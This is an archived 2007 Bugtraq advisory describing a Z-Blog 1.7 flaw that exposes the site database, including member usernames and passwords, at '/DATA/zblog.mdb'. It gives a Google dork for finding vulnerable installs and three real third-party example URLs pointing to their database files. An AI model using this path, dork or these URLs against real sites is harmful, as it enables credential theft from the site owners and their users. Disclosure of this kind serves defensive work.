lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070601111938.14216.qmail@securityfocus.com>
Date: 1 Jun 2007 11:19:38 -0000
From: Raed@...Mail.Com
To: bugtraq@...urityfocus.com
Subject: Z-Blog 1.7 Authentication Bypass Database Download Vulnerability

 * Author  : Hasadya Raed
 * Contact : RaeD@...Mail.Com ~>Israel Hacker
 * Greetz  : Fairoz :)
 * Advisory : Z-Blog 1.7 Authentication Bypass/Database Download Vulnerability 
 * Script   : Z-Blog 1.7            
 * Impact   : Remote 
 * Googledork : "Powered by Z-Blog 1.7" , "Powered By Z-Blog 1.7 Laputa Build 70216"
 * Download   : http://bbs.rainbowsoft.org/attachment.php?aid=92


--/ REPRODUCE \--

# Attackers Can Authentication Bypass In This Product By Add The Following Files:
  ('/DATA/zblog.mdb') And Download The Database Which Contains Table Named [blog_Member]
  The Users Names And Passwords Inside

--/ Examples \--

http://www.uistudio.cn/blog/DATA/zblog.mdb
http://www.kenyja.com/blog/DATA/zblog.mdb
http://www.netpub.cn/nffish/DATA/zblog.mdb

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ